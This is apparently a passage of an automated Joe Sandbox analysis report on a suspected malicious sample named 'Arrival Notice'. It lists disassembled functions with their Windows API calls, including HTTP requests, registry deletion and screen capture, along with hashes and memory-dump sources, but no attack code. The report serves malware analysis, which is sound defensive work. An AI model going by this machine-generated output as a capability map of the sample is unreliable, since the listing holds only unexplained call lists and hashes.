                  • Opcode ID: b6168d5e62a9ab00a9bf70991f0f78d27eba7de01c32677f267718d1e0521d91
                  • Instruction ID: 720d702772d5ea5a0605752d860673988f524fd7c9331e4c1e83e0930eaa79c3
                  • Opcode Fuzzy Hash: b6168d5e62a9ab00a9bf70991f0f78d27eba7de01c32677f267718d1e0521d91
                  • Instruction Fuzzy Hash: 4F711870644219BEFB228F25CC89FEABF68FF01324F244216F7156A5E0C7B1A950DB90
                  APIs
                  • DestroyWindow.USER32(?,?), ref: 00446DEB
                    • Part of subcall function 003B6B57: _wcslen.LIBCMT ref: 003B6B6A
                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00446E5F
                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00446E81
                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00446E94
                  • DestroyWindow.USER32(?), ref: 00446EB5
                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,003B0000,00000000), ref: 00446EE4
                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00446EFD
                  • GetDesktopWindow.USER32 ref: 00446F16
                  • GetWindowRect.USER32(00000000), ref: 00446F1D
                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00446F35
                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00446F4D
                    • Part of subcall function 003C9944: GetWindowLongW.USER32(?,000000EB), ref: 003C9952
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                  • String ID: 0$tooltips_class32
                  • API String ID: 2429346358-3619404913
                  • Opcode ID: aefe765eb1486e0bcd4934e6867c32eefcdbd2e647e0144eb8cc8e9057a6739b
                  • Instruction ID: 39bdb7de4287c8100972b5f1fbd69e19b63485c9103aeea6f0034b82bacdab51
                  • Opcode Fuzzy Hash: aefe765eb1486e0bcd4934e6867c32eefcdbd2e647e0144eb8cc8e9057a6739b
                  • Instruction Fuzzy Hash: 48715F74104344AFEB21CF18D854FAB7BE9FB8A304F15442EF59987261C774A90ACB1A
                  APIs
                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0042C4B0
                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0042C4C3
                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0042C4D7
                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0042C4F0
                  • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0042C533
                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0042C549
                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0042C554
                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0042C584
                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0042C5DC
                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0042C5F0
                  • InternetCloseHandle.WININET(00000000), ref: 0042C5FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                  • String ID:
                  • API String ID: 3800310941-3916222277
                  • Opcode ID: 27eca9588c627dee56ad8c426ee2b103d3aef27090cd621e8acea2d018b89273
                  • Instruction ID: 2ea71def38b13e99ae5423947726de92950d1ed4154f0bb23ba2ac44f0a2b896
                  • Opcode Fuzzy Hash: 27eca9588c627dee56ad8c426ee2b103d3aef27090cd621e8acea2d018b89273
                  • Instruction Fuzzy Hash: 2C519CB4600625BFDB218F60D9C8AAF7BFCFF09344F44442AF945D6210DB78E9449B68
                  APIs
                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00448592
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 004485A2
                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004485AD
                  • CloseHandle.KERNEL32(00000000), ref: 004485BA
                  • GlobalLock.KERNEL32(00000000), ref: 004485C8
                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004485D7
                  • GlobalUnlock.KERNEL32(00000000), ref: 004485E0
                  • CloseHandle.KERNEL32(00000000), ref: 004485E7
                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 004485F8
                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,0044FC38,?), ref: 00448611
                  • GlobalFree.KERNEL32(00000000), ref: 00448621
                  • GetObjectW.GDI32(?,00000018,000000FF), ref: 00448641
                  • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00448671
                  • DeleteObject.GDI32(00000000), ref: 00448699
                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004486AF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                  • String ID:
                  • API String ID: 3840717409-0
                  • Opcode ID: f60bc7e267d556694d3ce3eb84bb416a5e872f45d4596b0e7db89f94d923ffc6
                  • Instruction ID: 7d140f1140c9188c682c7661c6fb3880d376ab7319c7985322560c97ee6d7ca6
                  • Opcode Fuzzy Hash: f60bc7e267d556694d3ce3eb84bb416a5e872f45d4596b0e7db89f94d923ffc6
                  • Instruction Fuzzy Hash: 9C412B75601208BFEB519FA5CC88EAF7BB8FF8A711F144069F905E7260DB749901CB24
                  APIs
                  • VariantInit.OLEAUT32(00000000), ref: 00421502
                  • VariantCopy.OLEAUT32(?,?), ref: 0042150B
                  • VariantClear.OLEAUT32(?), ref: 00421517
                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 004215FB
                  • VarR8FromDec.OLEAUT32(?,?), ref: 00421657
                  • VariantInit.OLEAUT32(?), ref: 00421708
                  • SysFreeString.OLEAUT32(?), ref: 0042178C
                  • VariantClear.OLEAUT32(?), ref: 004217D8
                  • VariantClear.OLEAUT32(?), ref: 004217E7
                  • VariantInit.OLEAUT32(00000000), ref: 00421823
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                  • API String ID: 1234038744-3931177956
                  • Opcode ID: 0632c477644139bf9ee3dde863f41e2a67f1438ab9095aa392cc33a931efe76c
                  • Instruction ID: 7ef51ebbe2a02ffffcfb3971c85d524c302749e535379336521d23420366146a
                  • Opcode Fuzzy Hash: 0632c477644139bf9ee3dde863f41e2a67f1438ab9095aa392cc33a931efe76c
                  • Instruction Fuzzy Hash: 09D10231700525EBDB109F65E885BB9F7B1BF55700F94809BF406AB2A0DB38DC82DB66
                  APIs
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                    • Part of subcall function 0043C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0043B6AE,?,?), ref: 0043C9B5
                    • Part of subcall function 0043C998: _wcslen.LIBCMT ref: 0043C9F1
                    • Part of subcall function 0043C998: _wcslen.LIBCMT ref: 0043CA68
                    • Part of subcall function 0043C998: _wcslen.LIBCMT ref: 0043CA9E
                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0043B6F4
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0043B772
                  • RegDeleteValueW.ADVAPI32(?,?), ref: 0043B80A
                  • RegCloseKey.ADVAPI32(?), ref: 0043B87E
                  • RegCloseKey.ADVAPI32(?), ref: 0043B89C
                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0043B8F2
                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0043B904
                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 0043B922
                  • FreeLibrary.KERNEL32(00000000), ref: 0043B983
                  • RegCloseKey.ADVAPI32(00000000), ref: 0043B994
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                  • String ID: RegDeleteKeyExW$advapi32.dll
                  • API String ID: 146587525-4033151799
                  • Opcode ID: 905cb38186b4886fb3e6fc6abc20516b540d7e33c025abd112ba6e7307fc840e
                  • Instruction ID: d80ce6f621b271f687dd4637beb08d80e3933b1c58bd50d8dd338968e9883bf8
                  • Opcode Fuzzy Hash: 905cb38186b4886fb3e6fc6abc20516b540d7e33c025abd112ba6e7307fc840e
                  • Instruction Fuzzy Hash: 6DC1AD34204201AFC715DF14C495F6ABBE5EF88308F18949DF6998B7A2CB35E845CB85
                  APIs
                  • GetDC.USER32(00000000), ref: 004325D8
                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004325E8
                  • CreateCompatibleDC.GDI32(?), ref: 004325F4
                  • SelectObject.GDI32(00000000,?), ref: 00432601
                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0043266D
                  • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 004326AC
                  • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 004326D0
                  • SelectObject.GDI32(?,?), ref: 004326D8
                  • DeleteObject.GDI32(?), ref: 004326E1
                  • DeleteDC.GDI32(?), ref: 004326E8
                  • ReleaseDC.USER32(00000000,?), ref: 004326F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                  • String ID: (
                  • API String ID: 2598888154-3887548279
                  • Opcode ID: 69a02940c77d26e0be1c3ca4232908ed0415641ba619e13b92e267fe8c31c3ad
                  • Instruction ID: d96ce92d35bfd5034dfec326dbadd6787b33543ea4dc21b2e5abceb615f65963
                  • Opcode Fuzzy Hash: 69a02940c77d26e0be1c3ca4232908ed0415641ba619e13b92e267fe8c31c3ad
                  • Instruction Fuzzy Hash: BE611175D00219EFCF04CFA8D985AAEBBB6FF48310F24842AE955A7250D774A941CFA4
                  APIs
                  • ___free_lconv_mon.LIBCMT ref: 003EDAA1
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED659
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED66B
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED67D
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED68F
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED6A1
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED6B3
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED6C5
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED6D7
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED6E9
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED6FB
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED70D
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED71F
                    • Part of subcall function 003ED63C: _free.LIBCMT ref: 003ED731
                  • _free.LIBCMT ref: 003EDA96
                    • Part of subcall function 003E29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000), ref: 003E29DE
                    • Part of subcall function 003E29C8: GetLastError.KERNEL32(00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000,00000000), ref: 003E29F0
                  • _free.LIBCMT ref: 003EDAB8
                  • _free.LIBCMT ref: 003EDACD
                  • _free.LIBCMT ref: 003EDAD8
                  • _free.LIBCMT ref: 003EDAFA
                  • _free.LIBCMT ref: 003EDB0D
                  • _free.LIBCMT ref: 003EDB1B
                  • _free.LIBCMT ref: 003EDB26
                  • _free.LIBCMT ref: 003EDB5E
                  • _free.LIBCMT ref: 003EDB65
                  • _free.LIBCMT ref: 003EDB82
                  • _free.LIBCMT ref: 003EDB9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                  • String ID:
                  • API String ID: 161543041-0
                  • Opcode ID: dfe2c66552ff8a66f47ea04dbc537829d669105159cede4358d4b62083e33d3f
                  • Instruction ID: f94065acbd2c925ef3999e71976fdba980bcf8789b84b95fab7f897bf12d7856
                  • Opcode Fuzzy Hash: dfe2c66552ff8a66f47ea04dbc537829d669105159cede4358d4b62083e33d3f
                  • Instruction Fuzzy Hash: C5316F316043A99FDB23AA3AD846B5B77E9FF01310F125629F458DB1D2EF35AD508720
                  APIs
                  • GetClassNameW.USER32(?,?,00000100), ref: 0041369C
                  • _wcslen.LIBCMT ref: 004136A7
                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00413797
                  • GetClassNameW.USER32(?,?,00000400), ref: 0041380C
                  • GetDlgCtrlID.USER32(?), ref: 0041385D
                  • GetWindowRect.USER32(?,?), ref: 00413882
                  • GetParent.USER32(?), ref: 004138A0
                  • ScreenToClient.USER32(00000000), ref: 004138A7
                  • GetClassNameW.USER32(?,?,00000100), ref: 00413921
                  • GetWindowTextW.USER32(?,?,00000400), ref: 0041395D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                  • String ID: %s%u
                  • API String ID: 4010501982-679674701
                  • Opcode ID: b06b9f1437c4a14d71a3d8dc3e5a0014ca797501eb74af42a428bc598df48f64
                  • Instruction ID: 2341b9ada94a190add2e63f0e95dd516fa72ce6ff127a8acff63d68ea6d8e2fc
                  • Opcode Fuzzy Hash: b06b9f1437c4a14d71a3d8dc3e5a0014ca797501eb74af42a428bc598df48f64
                  • Instruction Fuzzy Hash: 5591D3B1204606AFD719DF24C885FEBF7A8FF44341F00852AF999D6290DB34EA85CB95
                  APIs
                  • GetClassNameW.USER32(?,?,00000400), ref: 00414994
                  • GetWindowTextW.USER32(?,?,00000400), ref: 004149DA
                  • _wcslen.LIBCMT ref: 004149EB
                  • CharUpperBuffW.USER32(?,00000000), ref: 004149F7
                  • _wcsstr.LIBVCRUNTIME ref: 00414A2C
                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00414A64
                  • GetWindowTextW.USER32(?,?,00000400), ref: 00414A9D
                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00414AE6
                  • GetClassNameW.USER32(?,?,00000400), ref: 00414B20
                  • GetWindowRect.USER32(?,?), ref: 00414B8B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                  • String ID: ThumbnailClass
                  • API String ID: 1311036022-1241985126
                  • Opcode ID: 45b650aadd7690940f2c4dd4bd4ac36bf83b8e895d9f97c4eb5e7f5eddd56c42
                  • Instruction ID: 01c923fcd89dcf94cf9cb7ac11bb4dcebcb8235a9bcb3fdebaba8a6ce5771045
                  • Opcode Fuzzy Hash: 45b650aadd7690940f2c4dd4bd4ac36bf83b8e895d9f97c4eb5e7f5eddd56c42
                  • Instruction Fuzzy Hash: 7C91BE711082059BDB04CF14C985BEB77E8FF84354F04846BFD899A295EB38ED85CBA9
                  APIs
                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0043CC64
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0043CC8D
                  • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0043CD48
                    • Part of subcall function 0043CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0043CCAA
                    • Part of subcall function 0043CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0043CCBD
                    • Part of subcall function 0043CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0043CCCF
                    • Part of subcall function 0043CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0043CD05
                    • Part of subcall function 0043CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0043CD28
                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 0043CCF3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                  • String ID: RegDeleteKeyExW$advapi32.dll
                  • API String ID: 2734957052-4033151799
                  • Opcode ID: 98530701ea9a65106bb80b569644ad5f4caed7231737b345f70c80d8ef9e2d04
                  • Instruction ID: ad6ca0703cc090fe6ebbb995a193c515a659fa161bb3e7a8ab224b2612a68b9a
                  • Opcode Fuzzy Hash: 98530701ea9a65106bb80b569644ad5f4caed7231737b345f70c80d8ef9e2d04
                  • Instruction Fuzzy Hash: 5A318075902128BBD7209B91DCC8EFFBB7CEF0A740F041176B905E2240DA389A45DBA8
                  APIs
                  • timeGetTime.WINMM ref: 0041E6B4
                    • Part of subcall function 003CE551: timeGetTime.WINMM(?,?,0041E6D4), ref: 003CE555
                  • Sleep.KERNEL32(0000000A), ref: 0041E6E1
                  • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0041E705
                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0041E727
                  • SetActiveWindow.USER32 ref: 0041E746
                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0041E754
                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0041E773
                  • Sleep.KERNEL32(000000FA), ref: 0041E77E
                  • IsWindow.USER32 ref: 0041E78A
                  • EndDialog.USER32(00000000), ref: 0041E79B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                  • String ID: BUTTON
                  • API String ID: 1194449130-3405671355
                  • Opcode ID: 1c36de8fb98fcc66ad7f90f97678102d8791877524dc0c8789665b3c32f60199
                  • Instruction ID: 6b11648396dbfd6ef932fcbb744d14d4e0515041f644f2c6525a208fddd900ce
                  • Opcode Fuzzy Hash: 1c36de8fb98fcc66ad7f90f97678102d8791877524dc0c8789665b3c32f60199
                  • Instruction Fuzzy Hash: 4821A77C201200AFFB015F21EDC9E6A3BA9F756349F58483AFC15A12B1EBB59C409B1C
                  APIs
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0041EA5D
                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0041EA73
                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0041EA84
                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0041EA96
                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0041EAA7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: SendString$_wcslen
                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                  • API String ID: 2420728520-1007645807
                  • Opcode ID: d81190b106391d49503c837c88507129264e62dd92184da8a82fdfae95eb0c8f
                  • Instruction ID: 579d83a8427f81d1fa5e2947d01d9d556504fae058a51724066a2af1585af3c6
                  • Opcode Fuzzy Hash: d81190b106391d49503c837c88507129264e62dd92184da8a82fdfae95eb0c8f
                  • Instruction Fuzzy Hash: B811E7B4A4022979D710A362DC4AEFF7E7CEFC1F44F10042BBA05A60D1DE740944C5B4
                  APIs
                  • GetDlgItem.USER32(?,00000001), ref: 00415CE2
                  • GetWindowRect.USER32(00000000,?), ref: 00415CFB
                  • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00415D59
                  • GetDlgItem.USER32(?,00000002), ref: 00415D69
                  • GetWindowRect.USER32(00000000,?), ref: 00415D7B
                  • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00415DCF
                  • GetDlgItem.USER32(?,000003E9), ref: 00415DDD
                  • GetWindowRect.USER32(00000000,?), ref: 00415DEF
                  • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00415E31
                  • GetDlgItem.USER32(?,000003EA), ref: 00415E44
                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00415E5A
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00415E67
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
